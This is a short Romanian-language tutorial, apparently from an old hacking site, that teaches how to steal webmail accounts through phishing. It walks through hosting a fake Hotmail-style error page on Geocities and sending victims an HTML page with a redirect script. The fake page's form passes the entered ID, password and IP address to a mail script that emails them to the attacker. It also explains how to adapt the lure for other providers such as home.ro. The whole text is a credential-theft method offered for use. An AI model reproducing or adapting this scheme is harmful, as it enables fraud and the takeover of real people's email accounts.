Doar nu va asteptati ca serverul home.ro sa fie vulnerabil!A fost odata,acum odata cu ultima mea
tentativa si-a intalat firewall.Este vorba de serverul gazda al lui andre.ro,dcmhosting.com
sau cam asa ceva.Astazi invatam cum sa furam conturi de mail.
1)Faceti-va o pagina la geocities.com,si folositi username-ul "johnny"
2)cand vi se cere adresa de mail dati adresa voastra
3)pagina aceasta o numiti index.html si o puneti pe domeniul de la
geocities.com pe care tocmai l-ati deschis
4)trimiteti victimei dvs aceasta pagina(care deschide message.htm) si asteptati:
<html><thead><title>titlu</title><head><body>
<script>self.location="numele site-ulul dvs de pe geocities";</script></body></html>
Cand victima deschide pagina este redirectat de functia self.location catre site-ul
dumneavoastra si crede ca are de-a face cu un mesaj de eroare.Ca urmare va introduce
ID-ul si parola care va vor parveni prin mail.Binenteles ca sa folositi acest sistem victima
trebuie sa aiba un cont la hotmail.Daca are cont in alta parte schimbati putin pagina index.htm
conform cu serverul de mail.Spre exemplu daca adresa victimei este nebunu@home.ro trebuie
sa primesc un mesaj de eroare ca venind de la home.ro nu de la homail cum este prezentat in exemplu.
Priviti sursa paginii message.htm si anume portiunea <FORM ACTION=".....">si veti vedea ca fisierul
mail.pl avand ca parametru userul dvs de la geocities(i-am zis johnny dar puteti sa-l schimbati)
va trimite voua prin mail ID-ul,parola si IP-ul fraierului.
email: